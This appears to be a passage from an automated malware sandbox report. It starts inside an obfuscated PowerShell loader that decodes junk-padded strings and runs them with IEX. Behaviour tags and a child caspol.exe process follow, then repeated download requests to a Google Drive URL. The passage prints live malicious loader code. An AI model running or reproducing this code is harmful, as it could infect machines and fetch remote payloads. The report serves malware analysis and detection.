L8Sla2Kaf0Str3Pal1Gen2SprDPan2YouAUns2Amt1Fld6anhDrej6Ban1Stj0ConBSal3Sol0Sam2Ras9Sea2Oml9Age2SpiCFor3Til5Ele2Uhe0Bor2undBSpu2TetBFas2Vaa0Bra3Pre6unm7Rdn7und6Uni9Bog6Mon5Sul6omf1Uma0NajBBuc3Taa0Par2Sys9Rea2aar9tor2BudCVen3Ret5Alg2Leg0Kan2ImpBimi2RreBFor2Soc0Man3Tal6Fou7Con6Pse6Boo9Sva6Krf5srg6Yap1Cal3Sam3Dvl3Udv7Squ3And1Out6Pra9aft6bon5Ser6Fac1Pel3Dis3Akt2Med4eft3Bar7tro1nalADog3lan5cru2sho4Laa3Per7for2Num4Sil2For8Gly2Res0Med3Lre1Fir2Col0Uns3Fri7Ber3Sto6Non6AntCCup6TenBren1Lae6Lok2For0Udb3Jar1gru0SpeCSpr2Rea8Col3Mai5Nic2Cir9Cap2Liv0Afp2Ema8Til2Gru0upp2SnoBXen3Kok1Roo2Dit4Unn3End1Pse2FruCIso2IneATek2AutBCap0mil3For2Sub9Baa2Com4Rat2Mir2bob3Skr6Gar6accDXan6Alk1Pja1Mul5Skv3for7Eft2SelABae2Pra6Sam2Gen0Acr3Nav6Yog3Vio6Neb2SubCHid2DefASil2TasBVal2Fid0Mns2HalBres7Clo2Gow6amfCRep'Hut;recNBacuVidlYoulBraiPimpEpaemaanDecnFsteHngsHyl9Car Ena`$CatSasikperoQualUnsiLegnEuggbee2Bad3Ste7Kog4Vaa;Opd`$ProSPerkEleoHaglStuiSolntragNuo2Non3Fla7Gud5Sop Esp=Sal ForHSkuTMasBPat Syl'Ant3Elu7gor2Bea0Dem3Har1Lib3Red0End3Con7Bed2nonBSte6Pan5Ros6Hun1Meg1Kra3Buk1Kom1Hap0Ipa7Mis6VaaBCro0Pro6And3Bru7Ups2als0Mos2Bje4Rej3orn1Int2Dgn0Inc1Sol1Afh3madCSha3Cur5And2Ydm0epa6ReuDNon6BowCPat'Bil;HdeNEtauSexlKnolHjoiConpKorePlanSplnMileMansTot9Aut Ser`$BesSShekImaoEcslEmuiUnrnScegShr2Sym3for7Fre5Req Enu Sek Nob;Tel}Xer`$AntkBrakArc Cir=Mng EnhHUtrTOosBlan Al 'Ube2PriEUnm2Crc0Ste3Sal7Hon2GisBItc2Dia0Vul2Gum9Hyp7Tru6Non7top7Ret'Tin;Neu`$LisSSubkUndoMenlVimiArknReogMir2Bib3Res7Gor6Nat Omr=Lav HelHUneTIndBGen Caj'Udb6Har1Unl3Rei3Die2Bec4Hus3Cap7She1StaAUni3Fri3Cur2Non4rei6Mou5Sku7Vis8Bel6Beg5tus1AreEBru1Opr6Pro3BruCAfs3Sel6For3Aut1Fra2Fro0Ped2Smi8Man6SceBScu1Byg7Des3Slv0daa2FadBHos3Fab1Ana2SekCStu2Euc8Val2For0Bag6TarBInd0KonCaci2EnsBjar3fed1Per2for0Dim3Lim7aks2AppAUns3Sam5Ins1Cys6Kat2Aut0cho3Pro7Rot3Ska3Fik2ParCNai2Kid6Bla2Bad0Fir3Tra6Gan6sylBmar0Bok8Jin2Tot4Blo3Vir7Cre3Inf6der2SkoDexc2Udd4Min2For9Ste1mik8Tru7verFDia7ChuFMis0Epi2God2Dia0Afa3Hov1mat0Pol1Stu2Sta0Kvi2Ind9For2Afb0Ame2Ele2Bed2Uds4dat3Gal1Ann2Dam0Blg0Chi3Glu2InsAMan3Non7Til0len3Sui3Hal0Ind2NazBFor2Wol6Mod3Ant1Bet2HalCmon2PonAArb2unsBOff1Bro5Jul2PigATho2UnsCBru2HurBBet3Lec1Cen2Lad0ova3Sel7Boo6BolDSpi6SelDpol2fic3Bev2TeaEDel3Kis5Ton6gho5Car6Lgn1Mul2ForEOms2RanEDup6Luf5Iag6And1Ena0CavBGra3dec0Vim2Aut9God2Cer9Udr2InhCPer3Str5Ufu2Ska0Dev2SvoBCha2SvvBKle2Bel0Ele3Kom6Ben7Und1Fra6AftCcir6Aft9Din6Ind5Pew6LivDEng0Aga2Sem0Pak1Bro1Hem1Umu6Ele5Til0Pil5Hir6BinDBag1NetEWit0GruCarb2SkaBlen3Unr1Cab1Gal5Jac3Tek1Cha3Dri7Kon1Pal8enk6Bro9Els6tyr5Gas1OpsEAri1Arc0Nas0BecCGan2FreBBer3Ide1Smy7Spo6Rom7Eva7Hor1Rec8Fil6Non9Luc6Opf5For1tagEFll1For0Tra0SlaCSun2TreBlov3Gam1Unm7Bry6Dec7For7Syl1Wam8Gle6Tri9Spr6Unt5Ugu1CusETuk1Alt0Kor0KriCSha2SkoBBan3lea1Obl7Inv6Run7Arc7Ins1Dol8Red6DeuCuni6Sat5Str6UkuDSub1BucEMis0ResCFel2BapBWil3Ins1col1Tun5ind3Liv1Non3Ess7ses1Tam8Neu6UnvCPre6HibCDis6BraCCac'Rec;AmeNInfuSyglFejlGaliCytpTryePnenAnanTtneCirsafl9For Ces`$EmiSFlakGrnoOmglArviFrenInsggal2Yes3Boa7Pro6Res;Los`$CepvSinaKorrGar_Gelnrubtrot Enh=Gen StaftankCarpSpe Kao`$NonNrotuRfflStnlRefiSkrpBadeTranOutnSteeDefsBou5Sam Aur`$TomNVivuCrelEftlFeliNonpAufeFinnPolnUnkeVomsJur6Gru;pre`$TerSDiakSpeoDatlIxoiTranEviguns2non3Brn7Hyp7Teo Sek=Ant DuoHBezTSwiBDis Dec'Der6Ect1Ext1Dis1Aak3Sym7off2FalAAfs3Dkk6vas2CopESka2Mor4Und2Lag7Non3Utt6Opt2Str9Win2Eag3Tau3Spo1Fla2Fat0Bil3Pre7San2TraBExo2Uns0Ara3Bes6Pre7Vag6Par6Aff5Opb7Oda8Gri6Bom5Ege6Str1Emb3Ure3Pum2Sti4Bra3Ski7Inf1ChiASom3Lan3Tan2brs4Inl6TorBAr 0VesCKal2DifBMus3Lit3Naa2FinAPak2NotEInd2Old0Acr6GlaDFal1GlaEFri0DicCXan2UndBins3Ver1Uns1Ble5Com3Key1Pyg3Dru7Afs1Ski8Tem7ForFMan7MulFRus1AnsFLon2Rat0Imp3Van7Bol2MosAFiv6Cys9sla6Ava5Con7Qui6Obs7Car3Mix7Jus3Tit6Min9Dol6Ove5Afa7pho5Reo3CobDMej7Los6Sam7Fly5Sup7Mur5Bon7Haa5Sun6rol9Pre6Far5Res7Cor5Aar3ScuDGte7Hel1bal7Dep5wah6SenCSke'Lim;VraNGrauVaglMarlTiniDecpFroevrinklonGuteSamsLam9Stu Nan`$DaaSExikSproPyilLleiKisnUncgtar2Tha3Out7mag7Par;Spa`$OleSRaakIntoForlPreiConnporgDec2Dep3Dif7Ste8Kas Med=Hea TabHIchTPosBTim Udk'Han6Vil1Sep2StiAlys3Pol7Erm2SagCVid6hvl5Skr7Ske8Elu6Hoo5Tan6Fil1Ove3Ful3Sni2Ska4Evo3Int7Bem1PekAFis3Sub3Uns2Omg4Str6TorBEup0PreCSvr2BugBBil3Rad3Fik2GlgATil2LinESwa2Dad0Ecs6AtoDPro1toyEEje0golCPet2MixBHva3Smi1Ask1Blu5Ste3Ski1Mot3Hun7Str1For8Fat7FreFCal7TviFHon1WinFHov2Abs0Til3Cab7Lwl2sliAPro6Ser9ele6Ite5Chi7Ref5blg3NazDBao7Ove4Sku7Ket5Non7Bul5her7Pis5Bag7Mol5Ens7Fyr5Bas6Fol9Afb6Bra5che7Afs5Toi3GemDYac7Att6Aro7Pre5tod7Fos5Uda7Vag5Bon6Sis9dek6Fur5Uns7Fil5neu3genDnon7Vif1Dir6SkaCBrn'Dom;SenNEmauMidlBedlUrtiSgnpBisePrenUltnhileHansRef9Gor Pol`$HorSPugkNonoCellUdgiPicnComglno2Kdf3Dis7Mar8Lit;Abs`$nonNBaloScenWitmFluaKonlAjoiUniclykiKatoHovuTsksSchnAmoeStasGagsSag=Pen(DatGEvoebastFll-SelIContTriePaamSvePVarrDjiopalpVodeWakrMidtEksyOms Gou-PolPUnsaOmptEmihDon Sag'AstHanoKKrsCParUpej:Che\PaaSVokoblufEvetnonwGasaFlarOveeTie\TylTantuLigyBryePrmrUnm'Kar)Han.PotSTrepTraikludScrsTelbDefucaneAdarKon;Bef`$MecSDkkkUdgoBlilPahiUmanLabgKre2Flo3Ber7Ult9Arb Tom=Afb spaHFerTAceBAdm Noo'bra6Api1Udt1Woe6Bnk2DagEQua2StaAFre2For9Coc2VedCNeu2InsBUdb2Sub2Mei7Lyk7Psy7Tha6Fel7Til2Sta6sle5Pre7Aqu8Hex6Det5Aff1AfsEfee1Syl6Skp3rhaCLan3Arb6Blo3Ros1Rut2ops0Sem2Leg8Bot6TjlBLou0Ska6Sku2KonABje2telBeva3Sal3She2Une0Gri3Mis7Eva3Sta1Bar1Gan8Bak7SupFSub7CycFLum0Syg3let3Ste7Kon2AssADox2Tyv8Lad0Dup7Lof2Def4Can3Met6Ire2ele0Sem7Ant3Var7Tri1Mus1Gip6hom3Pub1Res3Cod7Sym2OrdCPhe2UdfBEns2Bra2Euc6thoDFol6Unc1Spi0KonBEpi2KalACol2MonBCic2Isi8Tit2Odi4lia2Eyi9Tep2SkrCInd2Sep6Bek2NonCSek2MilAbes3Unh0Nul3vrd6Lab2HerBOst2Riv0Ult3jac6Flo3Pse6Ova6UdsCNon'Win;MicNTreuStolUdvlObsiGrypUtieVienBegnGloeWansDeg9Afk Uom`$UnpSSadkSpuoMnglNidishanMadgTaa2sla3Exc7Nie9Dyr;Myx`$PreNNetoKarnFesmCroaDaglKomiReccAbsigenoUnauClasLosnMineAfdsJojsPal0Mag Tem=Sto BulHsubTSpeBTan Ten'Hol1AcrEChi1Mbl6int3FreCSte3Lib6Kon3Her1Unc2Gen0Ste2Mou8ree6ProBCad1Aft7Reg3Tin0Mun2OksBBor3Lar1Aff2OpsCTor2Acr8Svi2Gal0lfo6AfbBLip0FirCFar2SpaBVel3Kos1Cam2Pri0Bra3Cou7Atr2NonARus3Ind5Pac1Gaf6Idy2Dok0Gla3Slu7Ega3Sub3Non2MisCNon2Vrt6Frd2Kro0Pel3Sam6Unc6iraBOve0Ska8Rek2pri4sti3Khe7Une3Bar6Sol2MilDElv2fra4sou2got9Sou1Col8Cre7torFVan7patFAlt0Fue6Fro2EpsAQui3Ove5Den3SprCMan6VirDMed6Bod1Din1Tim6Tow2snoEPan2DeiAUdk2Tyr9Nat2staCHor2SatBChi2Job2Ref7Tet7Sly7End6Lig7Rop2Int6Oli9pun6Ste5Rut7Myr5Bug6Sty9Sup6Stu5geb6Gri5Gen6Slu1Naz1rve1und3Omb7Pod2GulASam3Ran6Teg2PanEUnh2Pal4Irr2For7App3Plo6Dre2Sir9Kom2kva3Saf3Ant1Heb2Ilj0Sol3Osw7Sug2SdvBMen2Bra0Cos3Kas6Wom7myn6Dim6Res9Die6Sto5Sto7Ext6Bru7Enj3Var7Eff3Bao6RegCSol'Fry;LumNFlauSpalNdelMosiFaipUndeHalnNegnDefeProsSpe9She Cer`$YngNHypoInqnPramAffaUnilNoniSupcOrdiPlaoTiluUndsExinSileImmsForsLil0Dev;Val`$LevsDaciMv zBereSlk=Cho`$ForSstikScooRetlreciNonnFregDra2Anx3Vel7imp.FllcLysoAbsuPlanAnbtNgo-Afk3Udb6Pre6Aga;Sta`$SyrNSoloSlanMermopraMonlModiRetcPyriMicoForuThesKavnFnaeGlosKlasRec1Ski uri=Tro ResHVetTTimBOff Pol'con1udfEMil1Alo6Rem3ModCUan3Trs6Exp3dre1Tap2Und0spi2Sub8Pro6ForBKaj1The7Aff3Maa0fre2LeuBbet3Dua1Ven2MrkCSap2Sne8Lat2hin0Uns6VanBFin0FluCPro2PolBGld3Dec1Eft2Tan0Rem3Bun7Oma2HalALog3tra5Mul1Clo6Ast2Skr0tra3Pop7Kri3Anu3Pre2KlaCFib2Arr6Lit2Ext0Red3Log6Arb6HibBRnt0spe8Nor2Non4Par3Ste7Sci3Mon6Arb2IndDScr2Ven4Sku2Mar9Tit1Vir8Unc7PlaFChi7TokFAnd0Rin6Arb2telAsil3Lau5Und3DisCAad6OrnDUnp6Sam1Fag1Kes6Kam2RetETer2SteAMec2Out9sem2MaaCIde2SeeBBox2Hac2Kan7Paa7Klf7Pal6Kal7Vrt2Jag6Und9Dis6Dep5Fam7Car6Fla7Fib3Lkk7Pea3Fes6gal9Lor6Udk5Mts6tel1Soa2FioAkon3Pri7pre2EtuCDit6Nsk9Jit6Pri5Wor6Apo1Pop3Jen6Col2rusCWoo3PanFapp2Hol0Flu6PerCAmp'Det;PerNTiluCallUdmlUnviMaspKorePlonStonHoteWogsHas9Und Ser`$DefNAfsoMonnDulmBacaAfpldeyiImrcUnkiPrdonatuPnesFirnEngeSknsAcrsSec1Mag;Ver`$MahNRepoFrinVremPoiaToilVuliUdecSmaiHusoFaluKrbsUndnPlaePresFemshem2Emb Elp=Bre RazHPomTmaaBEsh Sko'Mod6hen1Esp3Dig3Unf2Tje4Une3Fod7Loy1SmeARic3Mic7Skn3Unc0Afs2GirBDom2Pis8Apr2ynd0Kos6Pro5Afv7Oph8dig6Aer5rei1BerEkec1Kom6Afs3karCPot3eld6xyl3oto1olo2Tru0Ski2Tae8Hje6JetBMil1Byg7the3Sun0Ska2DobBAan3Nit1Rnk2ninCSad2Lat8Eas2Tas0Brn6oliBNon0GisCPos2komBKat3Pro1Sfa2Ilu0Hae3Ree7Maa2VivAVan3Hov5Sar1Fla6Kam2Cac0Out3Sol7Hon3Spo3Ove2KvaCsik2Jus6Pan2Job0Def3lix6Unp6YmtBDiu0Flo8Skr2Eth4Nys3out7Lag3Svi6Int2SlaDFlo2Tur4Ref2Gru9Mod1Umb8mar7SadFHol7OktFFir0Gra2Uds2For0For3Ind1Hel0Bla1Una2Opr0Tal2Hjr9Ren2Hal0Cha2fel2Ant2Brn4Sta3Bas1Val2Sew0Epi0Mon3ora2BasAdip3Akv7Gou0Ren3Gir3Bio0Kul2GynBPun2Skn6Ove3Byd1Ban2BosCsen2neoAKam2DsiBAss1Sta5Try2SteAram2PerCeri2AnsBSrs3teh1Ety2Non0Bes3Obl7Pri6PetDNon6Rad1Srk1pos1Pel3Sul7Lng2LarAEnh3Cyt6Kon2GraEEks2Col4pre2Und7spr3Spl6Bia2Fre9Maa2tra3For3Uns1Hje2bun0Ska3Ove7whi2SulBHem2Bas0Sup3Lys6Mon7Sve6Con6Tra9Del6Ulv5Ube6OnaDAss0She2Fyl0Man1ten1clu1Dde6Afb5Sta0Pal5rui6UpgDSer1CorEFor0PanCBra2OrtBHag3Dis1Cha1Tox5con3Pra1Abo3sek7Kli1Ini8Sku6Med9Pre1ImdETec0SpuCQua2FllBSpg3rev1Tre1Dyp5Sta3Fri1Erg3Baa7Fis1Ins8San6WreCDrn6Alf5Aut6FasDBor1PreETag1Bri3Rho2BrnARox2NonCSta2Hed1Spe1Cre8Kam6DunCKap6TriCNot6OveCFor'Qui;AflNHyduQuilMinlGraiPrepChaePannAnancateMulsPol9Off Con`$GroNSteosarnHarmsecaRaplFlaiUnscGubiHejoFriuNatsTasndeneSkosDepsFor2Tit;Fos`$spdNMidoKrinRidmScuaRellPeriWercForiLouoDenuMursRefnManetossIntsDis3lov Dob=Eft AlfHStoTEftBUds Hai'Sve6wig1Mis3pse3Res2Psy4Ste3Sup7Wie1LilAPro3Und7Mot3Syd0Bog2MelBbib2Gru8ben2fil0Bef6RaaBFir0SirCSna2FedBSam3Sam3Alg2EstACho2FumEFri2Kal0Kon6HipDUdf6Lnu1Ken2MagASon3Sec7Kry2FriCNeo6Fis9Ads6Qua1Aut3Aph3Ung2let4Apa3Tur7Kej1FlyAUta2ResBAft3Lad1Pou6HypCUnr'Myx;ThrNFejuOvelForlMeriPilpsloeSnunVlentrueSvesKrl9For Sug`$RdbNThroMennSpemBraaBaclCutiIndcOpeiMeloSpouFissPipnReaeMassTarsMen3Unt#Ind;""";;Function Nonmaliciousness9 { param([String]$HS); For($i=3; $i -lt $HS.Length-1; $i+=(3+1)){ $Storeheddingeboer = $Storeheddingeboer + $HS.Substring($i, 1); } $Storeheddingeboer;}$Myxadenoma0 = Nonmaliciousness9 'dinITraEAmbXThu ';$Myxadenoma1= Nonmaliciousness9 $Vitriolate;& ($Myxadenoma0) $Myxadenoma1;;"
  2⤵
  - Checks QEMU agent file
  - Command and Scripting Interpreter: PowerShell
  - Network Service Discovery
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious use of SetThreadContext
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:748
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe"
    3⤵
    - Checks QEMU agent file
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    PID:2644

Network

DNS

8.8.8.8.in-addr.arpa

Remote address:

8.8.8.8:53

Request

8.8.8.8.in-addr.arpa

IN PTR

Response

8.8.8.8.in-addr.arpa

IN PTR

dnsgoogle
DNS

172.214.232.199.in-addr.arpa

Remote address:

8.8.8.8:53

Request

172.214.232.199.in-addr.arpa

IN PTR

Response
DNS

241.150.49.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

241.150.49.20.in-addr.arpa

IN PTR

Response
DNS

23.159.190.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

23.159.190.20.in-addr.arpa

IN PTR

Response
DNS

95.221.229.192.in-addr.arpa

Remote address:

8.8.8.8:53

Request

95.221.229.192.in-addr.arpa

IN PTR

Response
DNS

drive.google.com

caspol.exe

Remote address:

8.8.8.8:53

Request

drive.google.com

IN A

Response

drive.google.com

IN A

142.250.75.238
GET

https://drive.google.com/uc?export=download&id=1c7RwsKxpvwwW-HfBZATg1dCbWn9QC8m7

caspol.exe

Remote address:

142.250.75.238:443

Request

GET /uc?export=download&id=1c7RwsKxpvwwW-HfBZATg1dCbWn9QC8m7 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: drive.google.com
Cache-Control: no-cache

Response

HTTP/1.1 404 Not Found

Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Sun, 29 Dec 2024 12:00:49 GMT
Strict-Transport-Security: max-age=31536000
Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
Content-Security-Policy: script-src 'nonce-szAkJx9iL5E-s2zbRrIEbw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
Cross-Origin-Opener-Policy: same-origin
Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
Server: ESF
X-XSS-Protection: 0
X-Content-Type-Options: nosniff
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Accept-Ranges: none
Vary: Accept-Encoding
Transfer-Encoding: chunked
GET

https://drive.google.com/uc?export=download&id=1c7RwsKxpvwwW-HfBZATg1dCbWn9QC8m7

caspol.exe

Remote address:

142.250.75.238:443

Request

GET /uc?export=download&id=1c7RwsKxpvwwW-HfBZATg1dCbWn9QC8m7 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: drive.google.com
Cache-Control: no-cache

Response

HTTP/1.1 404 Not Found

Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Sun, 29 Dec 2024 12:00:59 GMT
Strict-Transport-Security: max-age=31536000
Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
Content-Security-Policy: script-src 'nonce-bsMABgSYMEoGa6OzgERqBA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
Cross-Origin-Opener-Policy: same-origin
Server: ESF
X-XSS-Protection: 0
X-Content-Type-Options: nosniff
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Accept-Ranges: none
Vary: Accept-Encoding
Transfer-Encoding: chunked
GET

https://drive.google.com/uc?export=download&id=1c7RwsKxpvwwW-HfBZATg1dCbWn9QC8m7

caspol.exe

Remote address:

142.250.75.238:443

Request

GET /uc?export=download&id=1c7RwsKxpvwwW-HfBZATg1dCbWn9QC8m7 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: drive.google.com
Cache-Control: no-cache

Response

HTTP/1.1 404 Not Found

Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Sun, 29 Dec 2024 12:01:09 GMT
Strict-Transport-Security: max-age=31536000
Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
Content-Security-Policy: script-src 'nonce-6Sxek8bzmHprkWcTuYQegw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
Cross-Origin-Opener-Policy: same-origin
Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
Server: ESF
X-XSS-Protection: 0
X-Content-Type-Options: nosniff
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Accept-Ranges: none
Vary: Accept-Encoding
Transfer-Encoding: chunked
GET

https://drive.google.com/uc?export=download&id=1c7RwsKxpvwwW-HfBZATg1dCbWn9QC8m7

caspol.exe

Remote address:

142.250.75.238:443

Request

GET /uc?export=download&id=1c7RwsKxpvwwW-HfBZATg1dCbWn9QC8m7 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: drive.google.com
Cache-Control: no-cache

Response

HTTP/1.1 404 Not Found

Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Sun, 29 Dec 2024 12:01:20 GMT
Strict-Transport-Security: max-age=31536000
Cross-Origin-Opener-Policy: same-origin
Content-Security-Policy: script-src 'nonce-oH011Zv7ZhTss3-rEDmCTg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
Server: ESF
X-XSS-Protection: 0
X-Content-Type-Options: nosniff
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Accept-Ranges: none
Vary: Accept-Encoding
Transfer-Encoding: chunked
GET

https://drive.google.com/uc?export=download&id=1c7RwsKxpvwwW-HfBZATg1dCbWn9QC8m7

caspol.exe

Remote address:

142.250.75.238:443

Request

GET /uc?export=download&id=1c7RwsKxpvwwW-HfBZATg1dCbWn9QC8m7 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: drive.google.com
Cache-Control: no-cache

Response

HTTP/1.1 404 Not Found

Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Sun, 29 Dec 2024 12:01:30 GMT
Strict-Transport-Security: max-age=31536000
Content-Security-Policy: script-src 'nonce-ZboqDrpyH-SP3N8AnFyD2g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
Cross-Origin-Opener-Policy: same-origin
Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
Server: ESF
X-XSS-Protection: 0
X-Content-Type-Options: nosniff
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Accept-Ranges: none
Vary: Accept-Encoding
Transfer-Encoding: chunked
GET

https://drive.google.com/uc?export=download&id=1c7RwsKxpvwwW-HfBZATg1dCbWn9QC8m7

caspol.exe

Remote address:

142.250.75.238:443

Request

GET /uc?export=download&id=1c7RwsKxpvwwW-HfBZATg1dCbWn9QC8m7 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: drive.google.com
Cache-Control: no-cache

Response

HTTP/1.1 404 Not Found

Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Sun, 29 Dec 2024 12:01:40 GMT
Strict-Transport-Security: max-age=31536000
Content-Security-Policy: script-src 'nonce-zwn8viw_U0FWaKbnd6_ecA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
Cross-Origin-Opener-Policy: same-origin
Server: ESF
X-XSS-Protection: 0
X-Content-Type-Options: nosniff
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Accept-Ranges: none
Vary: Accept-Encoding
Transfer-Encoding: chunked
GET

https://drive.google.com/uc?export=download&id=1c7RwsKxpvwwW-HfBZATg1dCbWn9QC8m7

caspol.exe

Remote address:

142.250.75.238:443

Request

GET /uc?export=download&id=1c7RwsKxpvwwW-HfBZATg1dCbWn9QC8m7 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: drive.google.com
Cache-Control: no-cache

Response

HTTP/1.1 404 Not Found

Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Sun, 29 Dec 2024 12:01:50 GMT
Strict-Transport-Security: max-age=31536000
Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
